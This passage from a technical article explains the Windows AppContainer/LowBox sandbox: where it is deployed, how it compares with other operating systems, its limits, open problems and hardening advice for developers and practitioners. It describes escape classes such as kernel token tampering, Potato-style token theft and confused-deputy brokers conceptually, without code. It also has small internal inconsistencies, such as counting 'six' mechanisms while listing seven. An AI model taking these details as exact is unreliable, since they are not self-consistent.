&lt;p&gt;These five fields and five steps are everything AppContainer is. The next section walks the four places they are exercised at production scale on a 2026 Windows 11 machine: every UWP app, every MSIX-packaged Win32 app, every Edge renderer, and every Windows Sandbox launch.&lt;/p&gt;
&lt;h2&gt;6. The Four 2026 Production Deployments&lt;/h2&gt;
&lt;p&gt;AppContainer is not a demonstration primitive. It is the principal mechanism behind every piece of trustworthy code execution on a modern Windows desktop. Four populations exercise it at production scale on a Windows 11 25H2 machine.&lt;/p&gt;
&lt;h3&gt;6.1 UWP apps&lt;/h3&gt;
&lt;p&gt;The Microsoft Calculator (&lt;code&gt;Microsoft.WindowsCalculator&lt;/code&gt;), the Mail and Calendar apps, Photos, Xbox, Settings, the modern Notepad, and the rest of the Windows-bundled Universal Windows Platform applications are MSIX packages whose manifest declares &lt;code&gt;uap10:TrustLevel=&quot;appContainer&quot;&lt;/code&gt; [@ms-learn-manifest-app]. Capabilities are declared explicitly in each manifest&apos;s &lt;code&gt;&amp;lt;Capabilities&amp;gt;&lt;/code&gt; element [@ms-learn-capabilities]. A typical UWP capabilities profile is small: &lt;code&gt;internetClient&lt;/code&gt; for a mail client; &lt;code&gt;picturesLibrary&lt;/code&gt; for Photos; &lt;code&gt;userAccountInformation&lt;/code&gt; for an app that wants the user&apos;s display name. The LowBox token is the only principal that ACLs in the per-package data directory at &lt;code&gt;%LOCALAPPDATA%\Packages\&amp;lt;PFN&amp;gt;\&lt;/code&gt; name. The six AppContainer isolation axes -- credential, device, file, network, process, and window isolation -- are listed on Microsoft Learn&apos;s AppContainer Isolation page [@ms-learn-isolation], and every UWP app exercises all six. Process isolation is AppContainer-only; UWP apps do not run inside Hyper-V.&lt;/p&gt;
&lt;h3&gt;6.2 MSIX-packaged desktop apps&lt;/h3&gt;
&lt;p&gt;The new File Explorer (in 25H2), the new Outlook, Power Automate Desktop, the modernised Snipping Tool, and a growing catalogue of third-party MSIX packages live in a different population. They are packaged using MSIX, and their manifest declares either &lt;code&gt;uap10:TrustLevel=&quot;mediumIL&quot;&lt;/code&gt; (with &lt;code&gt;&amp;lt;rescap:Capability Name=&quot;runFullTrust&quot; /&amp;gt;&lt;/code&gt;) or &lt;code&gt;uap10:TrustLevel=&quot;appContainer&quot;&lt;/code&gt; [@ms-learn-msix-container] [@ms-learn-manifest-app]. Many start at &lt;code&gt;mediumIL&lt;/code&gt; for legacy interop reasons and gradually migrate as the application drops dependencies on HKLM writes, on absolute file paths, and on registering arbitrary out-of-process COM. Microsoft Learn&apos;s MSIX page shows the migration shape: change the manifest from &lt;code&gt;&amp;lt;rescap:Capability Name=&quot;runFullTrust&quot; /&amp;gt;&lt;/code&gt; to &lt;code&gt;uap10:TrustLevel=&quot;appContainer&quot;&lt;/code&gt;, and the MSIX deployment stack does the LowBox plumbing on the application&apos;s behalf at install [@ms-learn-msix-container]. The &lt;code&gt;App Installer&lt;/code&gt; component is the surface that performs the install [@wiki-msix].&lt;/p&gt;
&lt;h3&gt;6.3 Microsoft Edge: LPAC renderers&lt;/h3&gt;
&lt;p&gt;Every Microsoft Edge renderer process on Windows 10 RS5 and later runs as a LowBox token with &lt;code&gt;WIN://NOALLAPPPKG&lt;/code&gt; set. The browser is Chromium-based -- &quot;A little over a year ago, we announced our intention to rebuild Microsoft Edge on the Chromium open source project&quot; said the Windows Experience Blog on January 15, 2020 [@edge-chromium-ga] -- and inherits Chromium&apos;s broker / target architecture and job-object lockdown [@chromium-sandbox]. The LPAC layer is the Windows-specific addition. Chromium&apos;s &lt;code&gt;lpac_capability.h&lt;/code&gt; defines the synthetic capabilities the renderer needs to function with &lt;code&gt;ALL_APP_PACKAGES&lt;/code&gt; stripped: &lt;code&gt;kLpacChromeInstallFiles&lt;/code&gt;, &lt;code&gt;kLpacCom&lt;/code&gt;, &lt;code&gt;kLpacCryptoServices&lt;/code&gt;, &lt;code&gt;kLpacIdentityServices&lt;/code&gt;, &lt;code&gt;kLpacMedia&lt;/code&gt;, &lt;code&gt;kRegistryRead&lt;/code&gt;, and the rest [@chromium-lpac]. Microsoft&apos;s &lt;code&gt;RendererAppContainerEnabled&lt;/code&gt; policy documents the customer-facing surface: &quot;Launches Renderer processes into an App Container for more security benefits&quot;; &quot;This policy will only take effect on Windows 10 RS5 and above&quot;; &quot;Windows: ≥ 96&quot;; &quot;If you enable this policy, Microsoft Edge launches the renderer process in an app container&quot; [@ms-learn-edge-lpac]. The policy is rolled out broadly on current Edge channels; the documentation itself notes the unconfigured default will move to in-app-container in a future update [@ms-learn-edge-lpac].&lt;/p&gt;

A renderer process has no reason to access the registry, no reason to open arbitrary COM classes, no reason to read most of the per-package directories under `%LOCALAPPDATA%\Packages\`. LPAC strips the ambient access by removing `ALL_APP_PACKAGES` from the token, and the renderer adds back only the synthetic capabilities Chromium needs to function (font cache reads, media foundation handles, the install-files capability). The combination -- *Chromium broker / target* outside the kernel plus *LPAC* inside the kernel -- is the most defended browser configuration on any current desktop OS. The Chromium sandbox document says the design intent: &quot;Sandbox operates at process-level granularity. Anything that needs to be sandboxed needs to live on a separate process&quot; [@chromium-sandbox]. LPAC is the Windows-side answer to *how* a separate process gets the smallest possible authority.
&lt;p&gt;This is the second insight to keep. Modern Microsoft Edge runs &lt;em&gt;all six post-Gen-0 mechanisms simultaneously&lt;/em&gt;: Medium IL host UI (Gen 0 baseline), MIC labels on objects (Gen 1), Chromium broker / target architecture (Gen 2), LowBox token on renderers (Gen 3), &lt;code&gt;WIN://NOALLAPPPKG&lt;/code&gt; LPAC (Gen 4), MSIX-packaged Edge (Gen 5), and optionally Windows Sandbox (Gen 6). Microsoft and Google reached the same browser-sandbox design from opposite directions, and the production browser uses &lt;em&gt;both&lt;/em&gt;. The right question is not &quot;AppContainer or Chromium sandbox?&quot; but &quot;where in the stack does each layer belong?&quot;&lt;/p&gt;
&lt;h3&gt;6.4 Windows Sandbox&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;WindowsSandbox.exe&lt;/code&gt; -- available on Pro, Enterprise, and Education editions of Windows 10 1903 and later [@ms-learn-sandbox-overview] -- launches the most isolated of the four populations. Three layers carry the design. The Hyper-V partition isolates a separate kernel from the host: &quot;It relies on the Microsoft hypervisor to run a separate kernel that isolates Windows Sandbox from the host&quot; [@ms-learn-sandbox-overview]. The Dynamic Base Image is the read-only file set the guest kernel boots from, stored as a 30 MB compressed package and unpacked to 500 MB on disk [@ms-learn-sandbox-arch]. Direct-map memory sharing means the host&apos;s read-only binaries (such as &lt;code&gt;ntdll.dll&lt;/code&gt;) &quot;use the same physical pages as those pages of the binary when loaded on the host&quot; [@ms-learn-sandbox-arch]. Security-research write-ups report that the host-side container manager that orchestrates this runs in an AppContainer; Microsoft&apos;s published architecture page does not document the host-side container-manager token type directly, so the load-bearing isolation property remains the Hyper-V partition itself.&lt;/p&gt;
&lt;p&gt;Starting with Windows 11 22H2, in-sandbox restarts persist data: &quot;data persists through restarts initiated within the sandbox&quot; [@ms-learn-sandbox-overview]. The persistence is bounded by the sandbox lifecycle; closing the sandbox window discards the guest entirely.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; On a running Windows 11 machine you can confirm the AppContainer status of any process two ways. Sysinternals Process Explorer&apos;s Security tab on a UWP process shows the package SID, the &lt;code&gt;AppContainer&lt;/code&gt; group, and the integrity level Low (&lt;code&gt;S-1-16-4096&lt;/code&gt;). James Forshaw&apos;s &lt;code&gt;NtObjectManager&lt;/code&gt; PowerShell module exposes &lt;code&gt;Get-NtToken&lt;/code&gt; and &lt;code&gt;Get-AccessibleObject -ProcessId &amp;lt;pid&amp;gt;&lt;/code&gt; which enumerate the kernel-visible token fields and the objects the process can reach [@sandboxsecuritytools]. Microsoft&apos;s own &lt;code&gt;SandboxSecurityTools&lt;/code&gt; repository on GitHub publishes &lt;code&gt;LaunchAppContainer&lt;/code&gt;: &quot;The LaunchAppContainer tool can be used to run applications in AppContainer or Less Privileged AppContainer (LPAC) sandboxes&quot; [@sandboxsecuritytools].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A comparison table for the four populations:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Deployment&lt;/th&gt;
&lt;th&gt;Year of ship&lt;/th&gt;
&lt;th&gt;Trust boundary&lt;/th&gt;
&lt;th&gt;Capabilities typical&lt;/th&gt;
&lt;th&gt;Kernel-exploit defence&lt;/th&gt;
&lt;th&gt;Hyper-V wrap&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;UWP apps&lt;/td&gt;
&lt;td&gt;2012&lt;/td&gt;
&lt;td&gt;AppContainer&lt;/td&gt;
&lt;td&gt;1-5, declared in manifest&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MSIX-packaged desktop apps&lt;/td&gt;
&lt;td&gt;2018&lt;/td&gt;
&lt;td&gt;AppContainer or mediumIL&lt;/td&gt;
&lt;td&gt;Varies; many declare runFullTrust&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft Edge LPAC renderers&lt;/td&gt;
&lt;td&gt;2020 (Edge Chromium GA)&lt;/td&gt;
&lt;td&gt;LPAC inside Chromium target&lt;/td&gt;
&lt;td&gt;Synthetic Lpac* set&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Optional via Windows Sandbox&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows Sandbox&lt;/td&gt;
&lt;td&gt;2019&lt;/td&gt;
&lt;td&gt;Hyper-V partition + AppContainer&lt;/td&gt;
&lt;td&gt;Implicit&lt;/td&gt;
&lt;td&gt;Yes (separate kernel)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Microsoft Defender Application Guard, the per-tab Hyper-V isolation for Edge that shipped in Windows 10 1709, was retired in Windows 11 24H2 [@ms-learn-mdag]. The replacement is Microsoft Defender SmartScreen plus the Edge Management Service; the per-tab Hyper-V boundary is gone. Per-application hypervisor isolation is no longer the Microsoft direction; Windows Sandbox is the surviving Hyper-V-wrapped variant.&lt;/p&gt;
&lt;p&gt;On the same machine, the same kernel, the same &lt;code&gt;SeAccessCheck&lt;/code&gt; runs the same five-step LowBox path millions of times a second across these four populations. Yet the LowBox token is not what every OS does. The next section asks: how do macOS, iOS, Android, and Linux solve the same problem -- and what do the differences teach us about &lt;em&gt;kernel-token-side&lt;/em&gt; enforcement versus &lt;em&gt;user-mode-policy-side&lt;/em&gt; enforcement?&lt;/p&gt;
&lt;h2&gt;7. Competing Approaches Across Operating Systems&lt;/h2&gt;
&lt;p&gt;Apple, Google, and the Linux distributions solved the same problem -- &lt;em&gt;how does the kernel give two co-tenanted applications different verdicts?&lt;/em&gt; -- with four structurally different answers. Each trade-off is a different bet on where in the system the per-app principal should live.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;iOS and iPadOS application sandbox.&lt;/strong&gt; Apple ships a mandatory per-app sandbox on every device since iPhone OS 1 in 2007 [@apple-platform-security-app]. From iPhone OS 2.0 / the 2008 App Store launch onward, the developer-facing principal is two-valued: a Bundle ID (developer-chosen string) and a Team ID (signer identity). Per-app entitlements declared in the signed bundle are the capability vocabulary. Enforcement is &lt;em&gt;mandatory&lt;/em&gt; -- there is no opt-out. The per-app filesystem container at &lt;code&gt;Containers/Data/Application/&amp;lt;bundle-uuid&amp;gt;/&lt;/code&gt; is the iOS analogue of &lt;code&gt;%LOCALAPPDATA%\Packages\&amp;lt;PFN&amp;gt;\&lt;/code&gt;. Where Windows extends the kernel token, iOS keeps the per-app profile in a TrustedBSD-derived MAC framework and consults it from kernel mode at every relevant resource manager.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;macOS App Sandbox.&lt;/strong&gt; macOS uses the same entitlement primitive Apple developed for iOS, plus a user-mode policy daemon (&lt;code&gt;sandboxd&lt;/code&gt;) that holds the per-app profile [@apple-app-sandbox]. The trade-off is that more decisions are made in user mode than on iOS, with corresponding flexibility costs. App Sandbox is &lt;em&gt;optional&lt;/em&gt; on macOS for non-App-Store distribution, in contrast to iOS, where it is mandatory.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Android per-app UID plus SELinux plus seccomp-bpf.&lt;/strong&gt; Android&apos;s &lt;em&gt;Application Sandbox&lt;/em&gt; page on the AOSP documents the layered model: every app receives a distinct UNIX UID; classical UNIX discretionary access control enforces per-app isolation; SELinux mandatory access control is layered on top from Android 5.0 onward; per-physical-user partitions arrived in Android 6.0; the seccomp-bpf system-call filter is required from Android 8.0; per-app SELinux sandboxes apply for &lt;code&gt;targetSdkVersion &amp;gt;= 28&lt;/code&gt; (Android 9); and path-based file restrictions tightened in Android 10 [@android-app-sandbox]. The kernel-side per-app principal is the UNIX UID. The MAC layers above add additional confinement.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Linux unprivileged namespaces plus seccomp plus AppArmor / SELinux plus Flatpak / Snap.&lt;/strong&gt; Linux&apos;s per-application sandbox is &lt;em&gt;composable&lt;/em&gt;. No first-class per-app principal lives in the kernel. The application sandboxes are layered above the user-keyed DAC: Flatpak and Snap build on unprivileged user namespaces and seccomp filters; Chromium on Linux uses the same kit. The Chromium FAQ&apos;s kernel-bugs caveat from §3 applies in every cross-OS configuration: a user-mode sandbox cannot defend against bugs in the kernel it runs on [@chromium-sandbox-faq].&lt;/p&gt;
&lt;p&gt;The structural axis falls out cleanly. macOS keeps the per-app profile in user-mode &lt;em&gt;outside&lt;/em&gt; the kernel token; iOS keeps it in user-mode but enforces &lt;em&gt;mandatorily&lt;/em&gt;; Android allocates a real UNIX UID; Windows extends the kernel-token SID alphabet. &lt;strong&gt;Windows is the only one of the four that partitions the kernel data structure.&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Operating system&lt;/th&gt;
&lt;th&gt;Primitive&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Where the principal lives&lt;/th&gt;
&lt;th&gt;Per-call cost model&lt;/th&gt;
&lt;th&gt;Kernel-exploit containment&lt;/th&gt;
&lt;th&gt;Mandatory?&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Windows 8+&lt;/td&gt;
&lt;td&gt;LowBox token (AppContainer)&lt;/td&gt;
&lt;td&gt;2012&lt;/td&gt;
&lt;td&gt;Inside the access token (kernel)&lt;/td&gt;
&lt;td&gt;Inline in &lt;code&gt;SeAccessCheck&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Opt-in via manifest / SDK&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS&lt;/td&gt;
&lt;td&gt;App Sandbox + entitlements&lt;/td&gt;
&lt;td&gt;2011 (Mac App Store)&lt;/td&gt;
&lt;td&gt;User-mode &lt;code&gt;sandboxd&lt;/code&gt; profile&lt;/td&gt;
&lt;td&gt;IPC for some decisions&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Opt-in (Mac App Store: yes)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;iOS / iPadOS&lt;/td&gt;
&lt;td&gt;App Sandbox + entitlements&lt;/td&gt;
&lt;td&gt;2007&lt;/td&gt;
&lt;td&gt;TrustedBSD MAC framework&lt;/td&gt;
&lt;td&gt;Inline kernel check&lt;/td&gt;
&lt;td&gt;No (Pegasus class proves)&lt;/td&gt;
&lt;td&gt;Yes, mandatory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Android&lt;/td&gt;
&lt;td&gt;UID + SELinux + seccomp&lt;/td&gt;
&lt;td&gt;2008&lt;/td&gt;
&lt;td&gt;UID space (kernel) + MAC&lt;/td&gt;
&lt;td&gt;Four checks per syscall&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes, mandatory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux&lt;/td&gt;
&lt;td&gt;Namespaces + seccomp + Flatpak / Snap&lt;/td&gt;
&lt;td&gt;2014 (Flatpak)&lt;/td&gt;
&lt;td&gt;Composable user-mode + kernel&lt;/td&gt;
&lt;td&gt;Variable per layer&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Opt-in per app&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

The sandbox is not a security silver bullet, but it is a strong last defense against nasty exploits. -- Chromium sandbox FAQ [@chromium-sandbox-faq]
&lt;p&gt;The Chromium project itself ports its broker / target sandbox across all four families. On Windows it sits &lt;em&gt;on top of&lt;/em&gt; AppContainer and LPAC. On macOS it uses seatbelt. On Linux it uses seccomp filters plus unprivileged user namespaces. On ChromeOS the same code talks to ChromeOS&apos;s own kernel-side enforcement. The broker / target pattern is operating-system-independent; what differs is the per-OS capability vocabulary the broker negotiates with [@chromium-sandbox].&lt;/p&gt;
&lt;p&gt;Putting the principal in the kernel access token is fast and elegant. The amortised cost of the LowBox path is one extra DACL pass plus the capability-claim check, all running inline in &lt;code&gt;SeAccessCheck&lt;/code&gt; with no IPC round-trip. But the kernel-side bet has a brittle edge: it is brittle exactly where putting it in the kernel is not enough. The next section asks what the LowBox token &lt;em&gt;cannot&lt;/em&gt; prove.&lt;/p&gt;
&lt;h2&gt;8. Theoretical Limits: What the LowBox Token Cannot Prove&lt;/h2&gt;
&lt;p&gt;Every security primitive has a perimeter beyond which it can no longer reason. The LowBox token has five.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 1: Kernel exploits.&lt;/strong&gt; Once the attacker is in kernel mode, they rewrite their own token. The LowBox bit becomes irrelevant. The Chromium sandbox FAQ states the principle plainly: &quot;the sandbox cannot provide any protection against bugs in system components such as the kernel it is running on&quot; [@chromium-sandbox-faq]. This is the load-bearing argument for Windows Sandbox&apos;s Hyper-V wrap (§4.7, §6.4). It is the third insight to keep.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The LowBox token is a runtime sandbox, not a privilege ceiling. To the rest of user mode a LowBox process is opaque and bounded; to the kernel it is a small extension of the access-check pipeline. A kernel-mode arbitrary write -- of which Windows has had a steady but small supply across its history -- gives the attacker the ability to set or clear &lt;code&gt;_TOKEN.Flags.LowBoxToken&lt;/code&gt;, swap out &lt;code&gt;PackageSid&lt;/code&gt;, append entries to &lt;code&gt;Capabilities[]&lt;/code&gt;, or simply impersonate a different token. The structural answer is hypervisor isolation, not better in-token checks. Windows Sandbox is the production implementation [@ms-learn-sandbox-overview].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Limit 2: Confused-deputy brokers.&lt;/strong&gt; A broker process outside the AppContainer is, by design, the bridge back to user-scoped resources. If the broker honours requests it should not have honoured, the AppContainer&apos;s caller succeeds in doing something it could not have done directly. The canonical class on Windows is RuntimeBroker, AppInfo (the UAC consent broker), Print, WebAuthn, voice activation, and the &lt;em&gt;Microsoft (R) Diagnostics Hub Standard Collector Service&lt;/em&gt; that Forshaw called &quot;DiagHub for short&quot; in his 2018 arbitrary-file-write writeup [@p0-arbitrary-write-2018]. The 1988 &lt;em&gt;Confused Deputy&lt;/em&gt; paper from the capability-systems literature [@hardy-confused-deputy] is the literature anchor for this whole class.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 3: Token-stealing.&lt;/strong&gt; An attacker who can duplicate a higher-privilege token via &lt;code&gt;NtDuplicateToken&lt;/code&gt;, &lt;code&gt;NtOpenProcessTokenEx&lt;/code&gt;, or any of the SeImpersonatePrivilege-stealing Potato-family attacks steps out of the AppContainer by impersonating a non-LowBox user. &lt;em&gt;Siloscape&lt;/em&gt; is the most-publicised Windows container escape: Daniel Prizmant&apos;s Unit 42 writeup characterises it as &quot;the first known malware targeting Windows containers&quot;, and records Microsoft&apos;s initial position that &quot;Windows Server containers are not a security boundary&quot; before later reclassifying that &quot;an escape from a Windows container to the host, when executed without administrator permissions inside the container, will in fact be considered a vulnerability&quot; [@siloscape]. Token-stealing is the same class one rung down: an AppContainer escape via impersonation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 4: Capability granularity.&lt;/strong&gt; &lt;code&gt;internetClient&lt;/code&gt; is &quot;the application can speak to the public internet&quot; with no per-host granularity. Each Windows capability is approximately as fine-grained as a Linux &lt;code&gt;CAP_*&lt;/code&gt;, not as fine-grained as an iOS entitlement key. There is no AppContainer-native equivalent of &quot;this app can connect to api.example.com:443 but nowhere else.&quot; The Microsoft Learn capabilities page enumerates the capability vocabulary [@ms-learn-capabilities]; the cardinality is in the dozens of standard capabilities plus custom ones, not in the millions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Limit 5: In-process side channels.&lt;/strong&gt; Once data is in the AppContainer process&apos;s address space, the AppContainer model has nothing to say about it. Hardware side channels (Spectre, MDS, Downfall), explicit channels (clipboard, WebRTC, browser-tab side channels in Edge), and out-of-band exfiltration via broker calls are all out of model. AppContainer is a &lt;em&gt;boundary&lt;/em&gt; primitive; once you are inside the boundary, the primitive does not constrain in-process behaviour.&lt;/p&gt;

The Windows Sandbox architecture page is explicit about the chain of reasoning [@ms-learn-sandbox-arch]. The host&apos;s read-only OS files can be shared with the sandbox without compromise (immutable; &quot;Most OS files are immutable and can be freely shared&quot;). The host&apos;s writable state cannot be shared (mutable; &quot;A small subset of operating system files are mutable and can&apos;t be shared&quot;). The remaining isolation question -- can a kernel exploit inside the guest reach the host? -- is answered structurally: the guest runs on a separate Microsoft hypervisor partition with a separate kernel. A guest-side kernel exploit gives the attacker control of the guest&apos;s `_TOKEN.Flags.LowBoxToken` field, but the host&apos;s kernel is untouched on the other side of the partition.
&lt;p&gt;These five limits define the research surface post-2024. The next section catalogues what is still open.&lt;/p&gt;
&lt;h2&gt;9. Open Problems&lt;/h2&gt;
&lt;p&gt;Six open problem classes are actively investigated in 2024-2026 research.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The &lt;code&gt;ALL_APP_PACKAGES&lt;/code&gt; ambient-access surface.&lt;/strong&gt; Even with LPAC, many default-installed resources are ACL&apos;d to the &lt;code&gt;ALL_APP_PACKAGES&lt;/code&gt; group; non-LPAC AppContainers inherit access to all of them. The research class is to enumerate the union of all &lt;code&gt;ALL_APP_PACKAGES&lt;/code&gt;-readable surfaces on a default Windows install and classify which leak cross-package data.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Capability-SID collisions and over-grant.&lt;/strong&gt; Third-party custom capability SIDs are derived from a string in the manifest; the collision resistance of the hash construction under adversarial choice of input string is an open question. A malicious manifest that produces a capability SID colliding with a privileged Microsoft-defined capability would be a structural break.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;LPAC capability-injection at process creation.&lt;/strong&gt; The capability list is supplied by the &lt;em&gt;creator&lt;/em&gt; of the AppContainer process; tightening which caller can ask for which capability has been a recurring servicing-bulletin theme. Forshaw&apos;s &lt;em&gt;Raising the Dead&lt;/em&gt; writeup (P0 Issue 483, fixed in MS15-111 as CVE-2015-2554 [@p0-raising-dead] [@nvd-cve-2015-2554]) and the 2018 &lt;em&gt;Arbitrary Object Directory Creation&lt;/em&gt; writeup (P0 Issue 1550 [@p0-1550]) are the canonical examples of bugs in this class.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Hyper-V-per-AppContainer (&quot;HVCI for AppContainers&quot;).&lt;/strong&gt; WDAG&apos;s 2024 retirement [@ms-learn-mdag] leaves a gap: there is no production direction for per-application hypervisor isolation. Windows Sandbox is the surviving Hyper-V-wrapped sandbox; per-tab or per-app HV isolation in Edge is not coming back. The research question is whether per-app Hyper-V can be reintroduced in a form that does not have WDAG&apos;s adoption problems.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Cross-package AppContainer-to-AppContainer attacks.&lt;/strong&gt; As third-party MSIX adoption grows, the cross-package attack surface (one third-party package abusing another&apos;s &lt;code&gt;\AppContainerNamedObjects\&amp;lt;other-package-sid&amp;gt;\&lt;/code&gt; ACL) grows. The 2018 P0 1550 writeup [@p0-1550] is the canonical example of a kernel-side variant; user-mode variants in third-party MSIX brokers are the next class.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Post-CrowdStrike user-mode EDR runtime.&lt;/strong&gt; After the July 2024 incident, Microsoft convened a multi-vendor endpoint-security summit and committed to a more isolated EDR / AV runtime in user mode. AppContainer or LPAC is one of the candidate runtimes for the new platform; architectural details are still being published.For Problem 1 specifically, the standard tool for enumerating the &lt;code&gt;ALL_APP_PACKAGES&lt;/code&gt;-readable surface is Forshaw&apos;s &lt;code&gt;NtObjectManager&lt;/code&gt; PowerShell module&apos;s &lt;code&gt;Get-AccessibleObject -ProcessId &amp;lt;pid&amp;gt;&lt;/code&gt; cmdlet -- it enumerates every kernel object a given process can reach, which is the right primitive for asking &quot;what does an &lt;code&gt;ALL_APP_PACKAGES&lt;/code&gt; member actually see?&quot; The companion Microsoft tool is &lt;code&gt;LaunchAppContainer&lt;/code&gt; from the official &lt;code&gt;SandboxSecurityTools&lt;/code&gt; repository on GitHub [@sandboxsecuritytools].&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft&apos;s decision to retire WDAG in Windows 11 24H2 [@ms-learn-mdag] is the proximate signal that per-application hypervisor isolation is &lt;em&gt;not&lt;/em&gt; the Microsoft direction. The 2024+ answer is &quot;harden the in-token AppContainer surface&quot; and &quot;reduce the broker attack surface&quot; rather than &quot;wrap every app in Hyper-V.&quot; The single shipping Hyper-V-wrapped sandbox is Windows Sandbox, and it is a user-launched primitive, not an OS-default for browsers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The unresolved problems share a structural property: they sit &lt;em&gt;between&lt;/em&gt; the token-level guarantee AppContainer makes and the resource managers that implement the consequences. The next section gives practical guidance for developers and practitioners working within these limits today.&lt;/p&gt;
&lt;h2&gt;10. Practical Guide&lt;/h2&gt;
&lt;p&gt;Two audiences need different answers. Developers need to know how to opt their code in. Practitioners need to know how to audit the deployment.&lt;/p&gt;
&lt;h3&gt;For developers&lt;/h3&gt;
&lt;p&gt;Package your Win32 app with MSIX and set &lt;code&gt;uap10:TrustLevel=&quot;appContainer&quot;&lt;/code&gt; in the manifest&apos;s &lt;code&gt;&amp;lt;Application&amp;gt;&lt;/code&gt; element [@ms-learn-manifest-app]. Stop adding &lt;code&gt;runFullTrust&lt;/code&gt; as a restricted capability by default; the manifest is a &lt;em&gt;budget&lt;/em&gt;, and every restricted capability is a lifetime ACL on your package SID [@ms-learn-capabilities] [@ms-learn-msix-container].&lt;/p&gt;
&lt;p&gt;Declare &lt;em&gt;only&lt;/em&gt; the capabilities your app needs in &lt;code&gt;&amp;lt;Capabilities&amp;gt;&lt;/code&gt;. Microsoft Learn&apos;s wording is exactly this: &quot;be sure to declare only the capabilities that your app needs&quot; [@ms-learn-capabilities]. Each extra &lt;code&gt;internetClient&lt;/code&gt; or &lt;code&gt;picturesLibrary&lt;/code&gt; is a lifetime allow ACE on the corresponding Capability SID.&lt;/p&gt;
&lt;p&gt;Use &lt;strong&gt;LPAC&lt;/strong&gt; for any process that does not need cross-package or cross-user resource access. The mechanism is the synthetic &lt;code&gt;WIN://NOALLAPPPKG&lt;/code&gt; capability in &lt;code&gt;SECURITY_CAPABILITIES.Capabilities[]&lt;/code&gt; at process creation [@ms-learn-implementing] [@chromium-lpac]. The Chromium tree&apos;s &lt;code&gt;lpac_capability.h&lt;/code&gt; is the canonical reference for which LPAC capabilities each kind of worker process needs [@chromium-lpac].&lt;/p&gt;
&lt;p&gt;Test your sandbox with Forshaw&apos;s &lt;code&gt;NtObjectManager&lt;/code&gt; PowerShell module&apos;s &lt;code&gt;Get-AccessibleObject -ProcessId &amp;lt;pid&amp;gt;&lt;/code&gt; cmdlet, which enumerates every kernel object your process can actually reach [@sandboxsecuritytools]. Tighten capabilities until the enumerated list matches your expectations. Microsoft&apos;s own &lt;code&gt;SandboxSecurityTools&lt;/code&gt; repository ships &lt;code&gt;LaunchAppContainer&lt;/code&gt; for the same kind of testing in the Insider bounty programme [@sandboxsecuritytools].&lt;/p&gt;
&lt;h3&gt;For practitioners&lt;/h3&gt;
&lt;p&gt;Identify which high-risk applications on your managed fleet can be MSIX-packaged and migrated to &lt;code&gt;uap10:TrustLevel=&quot;appContainer&quot;&lt;/code&gt;. Browsers, PDF viewers, and email clients are highest payoff because hostile content reaches them most often.&lt;/p&gt;
&lt;p&gt;Audit the per-package directory permissions in &lt;code&gt;%LOCALAPPDATA%\Packages\&amp;lt;PFN&amp;gt;\&lt;/code&gt;. The &lt;code&gt;LocalState&lt;/code&gt;, &lt;code&gt;RoamingState&lt;/code&gt;, and &lt;code&gt;AC&lt;/code&gt; subdirectories are the load-bearing entries; each should grant access to the package SID, not to broad groups.&lt;/p&gt;
